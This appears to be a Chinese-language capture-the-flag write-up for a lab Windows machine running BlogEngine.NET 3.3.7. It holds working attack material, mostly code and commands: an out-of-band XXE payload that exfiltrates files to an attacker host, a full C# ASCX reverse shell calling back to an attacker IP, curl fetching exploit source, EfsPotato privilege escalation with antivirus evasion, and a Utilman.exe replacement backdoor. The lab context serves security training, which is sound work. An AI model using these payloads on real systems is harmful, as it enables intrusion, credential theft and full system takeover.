端口扫描 靶机没有开启ping
└─# nmap --min-rate=10000 -p- exf.thm Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-05 16:39 UTC Nmap scan report for exf.thm (10.10.65.115) Host is up (0.0036s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 3389/tcp open ms-wbt-server 5985/tcp open wsman MAC Address: 02:D8:FF:08:7D:81 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 20.30 seconds
└─# nmap -sC -sT -sV -O -p80,3389,5985 exf.thm Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-05 16:40 UTC Nmap scan report for exf.thm (10.10.65.115) Host is up (0.00049s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: 403 - Forbidden: Access is denied. | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=EXFILIBUR | Not valid before: 2024-06-04T16:19:34 |_Not valid after: 2024-12-04T16:19:34 |_ssl-date: 2024-06-05T16:41:16+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: EXFILIBUR | NetBIOS_Domain_Name: EXFILIBUR | NetBIOS_Computer_Name: EXFILIBUR | DNS_Domain_Name: EXFILIBUR | DNS_Computer_Name: EXFILIBUR | Product_Version: 10.0.17763 |_ System_Time: 2024-06-05T16:41:11+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found MAC Address: 02:D8:FF:08:7D:81 (Unknown) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.88 seconds
└─# nmap --script=vuln -p80,3389,5985 exf.thm Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-05 16:45 UTC Nmap scan report for exf.thm (10.10.65.115) Host is up (0.00032s latency). PORT STATE SERVICE 80/tcp open http | http-enum: |_ /blog/: Blog |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 3389/tcp open ms-wbt-server 5985/tcp open wsman MAC Address: 02:D8:FF:08:7D:81 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 140.60 seconds
读取Users 是一台Win+IIS的服务,根目录是403。nmap扫描结果中存在一个/blog能够访问。
比较显眼的是一个登录,发现是blogengine.net,并且在主页的源码中找到版本为3.3.7
└─$ searchsploit blogengine -------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------- --------------------------------- BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection | xml/webapps/48422.txt BlogEngine 3.3 - XML External Entity Injection | windows/webapps/46106.txt BlogEngine 3.3.8 - 'Content' Stored XSS | aspx/webapps/48999.txt BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting | asp/webapps/32874.txt BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure | asp/webapps/35168.txt BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution | aspx/webapps/46353.cs BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution | aspx/webapps/47010.py BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal | aspx/webapps/47035.py BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution | aspx/webapps/47011.py BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection | aspx/webapps/47014.py -------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
可能存在目录穿越,RCE,XXE。根据47035.py,在/api/filemanager存在目录穿越,可以进行文件读取,读取根目录
http://exf.thm/blog/api/filemanager?path=/../../
<ArrayOfFileInstance> <FileInstance> <Created>6/6/2024 4:20:23 AM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files../..</FullPath> <IsChecked>false</IsChecked> <Name>...</Name> <SortOrder>0</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 2:57:57 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files../../blogs</FullPath> <IsChecked>false</IsChecked> <Name>blogs</Name> <SortOrder>1</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 2:57:57 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files../../datastore</FullPath> <IsChecked>false</IsChecked> <Name>datastore</Name> <SortOrder>2</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 6:41:39 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files../../files</FullPath> <IsChecked>false</IsChecked> <Name>files</Name> <SortOrder>3</SortOrder> </FileInstance> <FileInstance> <Created>6/6/2024 4:19:12 AM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files../../machine.config</FullPath> <IsChecked>false</IsChecked> <Name>machine.config</Name> <SortOrder>4</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 2:57:57 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files../../monstercache</FullPath> <IsChecked>false</IsChecked> <Name>monstercache</Name> <SortOrder>5</SortOrder> </FileInstance> <FileInstance> <Created>8/11/2023 10:54:51 AM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files../../pages</FullPath> <IsChecked>false</IsChecked> <Name>pages</Name> <SortOrder>6</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 2:57:57 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files../../posts</FullPath> <IsChecked>false</IsChecked> <Name>posts</Name> <SortOrder>7</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 2:57:57 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files../../profiles</FullPath> <IsChecked>false</IsChecked> <Name>profiles</Name> <SortOrder>8</SortOrder> </FileInstance> <FileInstance> <Created>6/6/2024 4:17:31 AM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files../../web.config</FullPath> <IsChecked>false</IsChecked> <Name>web.config</Name> <SortOrder>9</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>738.00 bytes</FileSize> <FileType>File</FileType> <FullPath>../../blogroll.xml</FullPath> <IsChecked>false</IsChecked> <Name>blogroll.xml</Name> <SortOrder>10</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>300.00 bytes</FileSize> <FileType>File</FileType> <FullPath>../../blogs.xml</FullPath> <IsChecked>false</IsChecked> <Name>blogs.xml</Name> <SortOrder>11</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>240.00 bytes</FileSize> <FileType>File</FileType> <FullPath>../../categories.xml</FullPath> <IsChecked>false</IsChecked> <Name>categories.xml</Name> <SortOrder>12</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 5:35:12 PM</Created> <FileSize>3.50 kb</FileSize> <FileType>File</FileType> <FullPath>../../customfields.xml</FullPath> <IsChecked>false</IsChecked> <Name>customfields.xml</Name> <SortOrder>13</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>61.00 bytes</FileSize> <FileType>File</FileType> <FullPath>../../extensionmap.txt</FullPath> <IsChecked>false</IsChecked> <Name>extensionmap.txt</Name> <SortOrder>14</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>11.86 kb</FileSize> <FileType>File</FileType> <FullPath>../../labels.txt</FullPath> <IsChecked>false</IsChecked> <Name>labels.txt</Name> <SortOrder>15</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 5:35:09 PM</Created> <FileSize>42.89 kb</FileSize> <FileType>File</FileType> <FullPath>../../logger.txt</FullPath> <IsChecked>false</IsChecked> <Name>logger.txt</Name> <SortOrder>16</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>19.00 bytes</FileSize> <FileType>File</FileType> <FullPath>../../newsletter.xml</FullPath> <IsChecked>false</IsChecked> <Name>newsletter.xml</Name> <SortOrder>17</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>109.00 bytes</FileSize> <FileType>File</FileType> <FullPath>../../packagefiles.xml</FullPath> <IsChecked>false</IsChecked> <Name>packagefiles.xml</Name> <SortOrder>18</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>101.00 bytes</FileSize> <FileType>File</FileType> <FullPath>../../packages.xml</FullPath> <IsChecked>false</IsChecked> <Name>packages.xml</Name> <SortOrder>19</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>554.00 bytes</FileSize> <FileType>File</FileType> <FullPath>../../pingservices.xml</FullPath> <IsChecked>false</IsChecked> <Name>pingservices.xml</Name> <SortOrder>20</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>4.20 kb</FileSize> <FileType>File</FileType> <FullPath>../../rights.xml</FullPath> <IsChecked>false</IsChecked> <Name>rights.xml</Name> <SortOrder>21</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>388.00 bytes</FileSize> <FileType>File</FileType> <FullPath>../../roles.xml</FullPath> <IsChecked>false</IsChecked> <Name>roles.xml</Name> <SortOrder>22</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>5.47 kb</FileSize> <FileType>File</FileType> <FullPath>../../settings.xml</FullPath> <IsChecked>false</IsChecked> <Name>settings.xml</Name> <SortOrder>23</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>587.00 bytes</FileSize> <FileType>File</FileType> <FullPath>../../stopwords.txt</FullPath> <IsChecked>false</IsChecked> <Name>stopwords.txt</Name> <SortOrder>24</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>633.00 bytes</FileSize> <FileType>File</FileType> <FullPath>../../users.xml</FullPath> <IsChecked>false</IsChecked> <Name>users.xml</Name> <SortOrder>25</SortOrder> </FileInstance> </ArrayOfFileInstance>
访问/../../App_Data/
<ArrayOfFileInstance> <FileInstance> <Created>6/6/2024 5:22:28 AM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files/../../App_Data</FullPath> <IsChecked>false</IsChecked> <Name>...</Name> <SortOrder>0</SortOrder> </FileInstance> <FileInstance> <Created>6/6/2024 4:57:59 AM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files/../../App_Data/App_Data</FullPath> <IsChecked>false</IsChecked> <Name>App_Data</Name> <SortOrder>1</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 2:57:57 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files/../../App_Data/blogs</FullPath> <IsChecked>false</IsChecked> <Name>blogs</Name> <SortOrder>2</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 2:57:57 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files/../../App_Data/datastore</FullPath> <IsChecked>false</IsChecked> <Name>datastore</Name> <SortOrder>3</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 6:41:39 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files/../../App_Data/files</FullPath> <IsChecked>false</IsChecked> <Name>files</Name> <SortOrder>4</SortOrder> </FileInstance> <FileInstance> <Created>6/6/2024 4:19:12 AM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files/../../App_Data/machine.config</FullPath> <IsChecked>false</IsChecked> <Name>machine.config</Name> <SortOrder>5</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 2:57:57 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files/../../App_Data/monstercache</FullPath> <IsChecked>false</IsChecked> <Name>monstercache</Name> <SortOrder>6</SortOrder> </FileInstance> <FileInstance> <Created>8/11/2023 10:54:51 AM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files/../../App_Data/pages</FullPath> <IsChecked>false</IsChecked> <Name>pages</Name> <SortOrder>7</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 2:57:57 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files/../../App_Data/posts</FullPath> <IsChecked>false</IsChecked> <Name>posts</Name> <SortOrder>8</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 2:57:57 PM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files/../../App_Data/profiles</FullPath> <IsChecked>false</IsChecked> <Name>profiles</Name> <SortOrder>9</SortOrder> </FileInstance> <FileInstance> <Created>6/6/2024 4:17:31 AM</Created> <FileSize/> <FileType>Directory</FileType> <FullPath>~/App_Data/files/../../App_Data/web.config</FullPath> <IsChecked>false</IsChecked> <Name>web.config</Name> <SortOrder>10</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>738.00 bytes</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/blogroll.xml</FullPath> <IsChecked>false</IsChecked> <Name>blogroll.xml</Name> <SortOrder>11</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>300.00 bytes</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/blogs.xml</FullPath> <IsChecked>false</IsChecked> <Name>blogs.xml</Name> <SortOrder>12</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>240.00 bytes</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/categories.xml</FullPath> <IsChecked>false</IsChecked> <Name>categories.xml</Name> <SortOrder>13</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 5:35:12 PM</Created> <FileSize>3.50 kb</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/customfields.xml</FullPath> <IsChecked>false</IsChecked> <Name>customfields.xml</Name> <SortOrder>14</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>61.00 bytes</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/extensionmap.txt</FullPath> <IsChecked>false</IsChecked> <Name>extensionmap.txt</Name> <SortOrder>15</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>11.86 kb</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/labels.txt</FullPath> <IsChecked>false</IsChecked> <Name>labels.txt</Name> <SortOrder>16</SortOrder> </FileInstance> <FileInstance> <Created>8/9/2023 5:35:09 PM</Created> <FileSize>45.48 kb</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/logger.txt</FullPath> <IsChecked>false</IsChecked> <Name>logger.txt</Name> <SortOrder>17</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>19.00 bytes</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/newsletter.xml</FullPath> <IsChecked>false</IsChecked> <Name>newsletter.xml</Name> <SortOrder>18</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>109.00 bytes</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/packagefiles.xml</FullPath> <IsChecked>false</IsChecked> <Name>packagefiles.xml</Name> <SortOrder>19</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>101.00 bytes</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/packages.xml</FullPath> <IsChecked>false</IsChecked> <Name>packages.xml</Name> <SortOrder>20</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>554.00 bytes</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/pingservices.xml</FullPath> <IsChecked>false</IsChecked> <Name>pingservices.xml</Name> <SortOrder>21</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>4.20 kb</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/rights.xml</FullPath> <IsChecked>false</IsChecked> <Name>rights.xml</Name> <SortOrder>22</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>388.00 bytes</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/roles.xml</FullPath> <IsChecked>false</IsChecked> <Name>roles.xml</Name> <SortOrder>23</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>5.47 kb</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/settings.xml</FullPath> <IsChecked>false</IsChecked> <Name>settings.xml</Name> <SortOrder>24</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>587.00 bytes</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/stopwords.txt</FullPath> <IsChecked>false</IsChecked> <Name>stopwords.txt</Name> <SortOrder>25</SortOrder> </FileInstance> <FileInstance> <Created>2/5/2019 5:47:20 PM</Created> <FileSize>633.00 bytes</FileSize> <FileType>File</FileType> <FullPath>/../../App_Data/users.xml</FullPath> <IsChecked>false</IsChecked> <Name>users.xml</Name> <SortOrder>26</SortOrder> </FileInstance> </ArrayOfFileInstance>
https://www.securitymetrics.com/blog/blogenginenet-xml-external-entity-attacks
根据这个利用,可以利用XXE来实现任意文件读取来读取users.xml。首先试着读取win.ini
首先创建一个oob.xml,来访问远程主机的exfil.dtd
<?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://$LHOST/exfil.dtd"> <foo>&e1;</foo>
在本地创建一个exfil.dtd
<!ENTITY % p1 SYSTEM "file:///C:/WINDOWS/win.ini"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/EX?%p1;'>"> %p2;
然后在本地开启一个web服务器之后
curl 'http://exf.thm/blog/syndication.axd?apml=http://LHOST/oob.xml'
但是提示连接不上远程主机,根据房间提示,会有”brickwall”,也许存在防火墙,改用445端口之后,有回显
10.10.126.190 - - [06/Jun/2024 11:31:59] "GET /oob.xml HTTP/1.1" 200 - 10.10.126.190 - - [06/Jun/2024 11:31:59] "GET /exfil.dtd HTTP/1.1" 200 - 10.10.126.190 - - [06/Jun/2024 11:32:00] code 404, message File not found 10.10.126.190 - - [06/Jun/2024 11:32:00] "GET /EX?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 HTTP/1.1" 404 -
读取成功,更改exfil.xml来读取users.xml
<!ENTITY % p1 SYSTEM "file:///C:/WINDOWS/win.ini"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/EX?%p1;'>"> %p2;
结果进行url解码得到:
<Users> <User> <UserName>Admin</UserName> <Password>wobS/AvKFPT5qP9FgQyh7C kc k 1rBzbOf7Oxfptw0=</Password> <Email>post@example.com</Email> <LastLoginTime>2007-12-05 20:46:40</LastLoginTime> </User> <!-- <User> <UserName>merlin</UserName> <Password></Password> <Email>mark@email.com</Email> <LastLoginTime>2023-08-11 10:58:51</LastLoginTime> </User> --> <User> <UserName>guest</UserName> <Password>hJg8YPfarcHLhphiH4AsDZ aPDwpXIEHSPsEgRXBhuw=</Password> <Email>guest@email.com</Email> <LastLoginTime>2023-08-12 08:47:51</LastLoginTime> </User> </Users>
但是有问题的是,url解码的过程中”+”也会被解码,所以空格要替换成”+”
之后再进行base64解码,再转换为16进制
admin
└─$ echo -n 'wobS/AvKFPT5qP9FgQyh7C+kc+k+1rBzbOf7Oxfptw0=' |base64 -d |xxd -p -c 32 c286d2fc0bca14f4f9a8ff45810ca1ec2fa473e93ed6b0736ce7fb3b17e9b70d
guest
└─$ echo -n 'hJg8YPfarcHLhphiH4AsDZ+aPDwpXIEHSPsEgRXBhuw=' |base64 -d |xxd -p -c 32 84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec
guest的哈希解的密码为”guest”
Getshell 登录之后是guest身份,之后可以利用一个文件上传一个反弹shell配合cookie参数的目录遍历来触发反弹shell
参考上面的aspx/webapps/47011.py
需要有一个可以编辑theme的用户,在右下角有一份草稿文章,里面能够找到kingarthy也就是admin的密码:Excal1burP@ss1337
切换至管理员用户,左边多了一栏”CUSTOM”,里面有themes
发包:
POST /blog/api/upload?action=file HTTP/1.1 Host: exf.thm User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/plain Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: XXX Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063 Content-Length: 2076 -----------------------------12143974373743678091868871063 Content-Disposition: form-data; filename="PostView.ascx" <%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %> <%@ Import Namespace="BlogEngine.Core" %> <script runat="server"> static System.IO.StreamWriter streamWriter; protected override void OnLoad(EventArgs e) { base.OnLoad(e); using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.11.77.28", 445)) { using(System.IO.Stream stream = client.GetStream()) { using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) { streamWriter = new System.IO.StreamWriter(stream); StringBuilder strInput = new StringBuilder(); System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } </script> <asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder> -----------------------------12143974373743678091868871063--
response:
HTTP/1.1 201 Created Cache-Control: no-cache Pragma: no-cache Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET Date: Thu, 06 Jun 2024 13:01:28 GMT Connection: close Content-Length: 72 "/blog/file.axd?file=%2f2024%2f06%2fPostView.ascx|PostView.ascx (1.8KB)"
用之前的那个目录穿越来查看是否上传成功
└─$ curl 'http://exf.thm/blog/api/filemanager?path=/../../App_Data/files/2024/06/' [{"IsChecked":false,"SortOrder":0,"Created":"6/6/2024 1:05:58 PM","Name":"...","FileSize":"","FileType":0,"FullPath":"~/App_Data/files/../../App_Data/files/2024/06","ImgPlaceholder":""},{"IsChecked":false,"SortOrder":1,"Created":"6/6/2024 1:01:28 PM","Name":"PostView.ascx","FileSize":"1.85 kb","FileType":1,"FullPath":"/../../App_Data/files/2024/06/PostView.ascx","ImgPlaceholder":"fa fa-file-o"}]
利用cookie中的theme来目录穿越进行触发反弹shell
└─$ curl -b "theme=../../App_Data/files/2024/06" 'http://exf.thm/blog/'
得到反弹shell,作为merlin
提权 主机上还存在着kingarthy和Administrator
merlin用户是有SeImpersonatePrivilege权限的,上传一个PrintSpoofer,嘶发现似乎上传不了文件,也许是被杀掉了,因为curl的时候是能curl到本地的
尝试使用kingarthy之前的密码进行RDP连接,发现密码复用。有了界面之后才知道之前的上传都被windowsDenfender拦了,print.exe会被检测
可以使用这个进行本地编译实现免杀效果:
https://github.com/zcgonvh/EfsPotato
回到反弹shell中,在merlin用户目录,因为只有他有模拟令牌的权限
curl http://10.10.4.48:53/EfsPotato.cs -o EfsPotato.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe .\EfsPotato.cs -nowarn:1691,618
使用csc进行编译
EfsPotato.exe whoami C:\Users\merlin\Desktop>EfsPotato.exe whoami Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). Part of GMH's fuck Tools, Code By zcgonvh. CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] [+] Current user: EXFILIBUR\merlin [+] Pipe: \pipe\lsarpc [!] binding ok (handle=fc09d0) [+] Get Token: 872 [!] process with pid: 5100 created. ============================== nt authority\system
现在我们是root!
EfsPotato.exe "cmd.exe /C net user administrator admin123!"
更改管理员密码来RDP连接
方法二:通过kingarthy的SeTakeOwnershipPrivilege权限来改变文件的拥有权
takeown /f C:\Windows\System32\Utilman.exe icacls C:\Windows\System32\Utilman.exe /grant kingarthy:F copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
碎碎念 真的挺难的一个房间,从exp的利用,XXE读取文件到文件上传。exp的尝试过程也是比较困难的。以及防火墙和杀软的存在让这个房间的难度也上升了不少。windows果然还是比较难啊
